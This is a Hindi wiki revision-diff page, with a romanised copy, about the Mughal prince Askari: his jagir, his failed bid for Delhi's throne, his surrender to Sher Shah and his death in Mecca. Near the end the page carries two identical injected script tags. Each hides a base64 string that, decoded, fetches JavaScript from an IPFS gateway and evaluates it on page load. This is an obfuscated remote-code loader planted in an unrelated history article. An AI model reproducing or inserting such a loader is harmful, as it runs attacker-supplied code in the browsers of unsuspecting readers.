Difference between revisions of "अस्करी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 5: Line 5:
 
===द्धेष भाव===
 
===द्धेष भाव===
 
जब हुमायूँ बंगाल गया तो दिल्ली में उसकी अनुपस्थिति में अस्करी ने गद्दी पर क़ब्ज़ा करने की कोशिश की, लेकिन पराजित हुमायूँ के दिल्ली लौटने से उसकी योजना सफल नहीं हो सकी। 1540-54 ई. के बीच जब हुमायूँ को [[कन्नौज]] की लड़ाई में पराजित होने के बाद दर-दर भटकना पड़ा और [[भारत]] छोड़कर भागना पड़ा, तो अस्करी ने उसकी कोई मदद नहीं की। अस्करी ने [[शेरशाह]] के सामने आत्मसमर्पण करके अपने प्राण बचाये। हुमायूँ ने जब दिल्ली पर फिर से क़ब्ज़ा किया, तो उसने अस्करी को क्षमा कर दिया, लेकिन उसे [[मक्का]] जाना पड़ा, जहाँ पर उसकी मृत्यु हो गई।
 
जब हुमायूँ बंगाल गया तो दिल्ली में उसकी अनुपस्थिति में अस्करी ने गद्दी पर क़ब्ज़ा करने की कोशिश की, लेकिन पराजित हुमायूँ के दिल्ली लौटने से उसकी योजना सफल नहीं हो सकी। 1540-54 ई. के बीच जब हुमायूँ को [[कन्नौज]] की लड़ाई में पराजित होने के बाद दर-दर भटकना पड़ा और [[भारत]] छोड़कर भागना पड़ा, तो अस्करी ने उसकी कोई मदद नहीं की। अस्करी ने [[शेरशाह]] के सामने आत्मसमर्पण करके अपने प्राण बचाये। हुमायूँ ने जब दिल्ली पर फिर से क़ब्ज़ा किया, तो उसने अस्करी को क्षमा कर दिया, लेकिन उसे [[मक्का]] जाना पड़ा, जहाँ पर उसकी मृत्यु हो गई।
 
  
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 08:04, 28 November 2010

vansh parichay

askari pratham mugal samrat babar (1526-30 ee.) ka chautha aur sabase chhota beta tha.

askari ko usake sabase b de bhaee humayooan (1530-56 ee.) ne sambhal ki jagir di thi. bad mean askari 1534 ee. mean humayooan ke gujarat abhiyan mean usake sath raha, jahaan asani se vijay milane ke bad vah aish-aram mean p d gaya. vah humayooan ke sath dilli laut aya. jab humayooan 1539 ee. mean bangal ke abhiyan par gaya to askari usake sath nahian gaya aur is prakar baksar ki l daee mean humayooan ki parajay mean vah bhagidar nahian tha.

ddhesh bhav

jab humayooan bangal gaya to dilli mean usaki anupasthiti mean askari ne gaddi par qabza karane ki koshish ki, lekin parajit humayooan ke dilli lautane se usaki yojana saphal nahian ho saki. 1540-54 ee. ke bich jab humayooan ko kannauj ki l daee mean parajit hone ke bad dar-dar bhatakana p da aur bharat chho dakar bhagana p da, to askari ne usaki koee madad nahian ki. askari ne sherashah ke samane atmasamarpan karake apane pran bachaye. humayooan ne jab dilli par phir se qabza kiya, to usane askari ko kshama kar diya, lekin use makka jana p da, jahaan par usaki mrityu ho gee.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh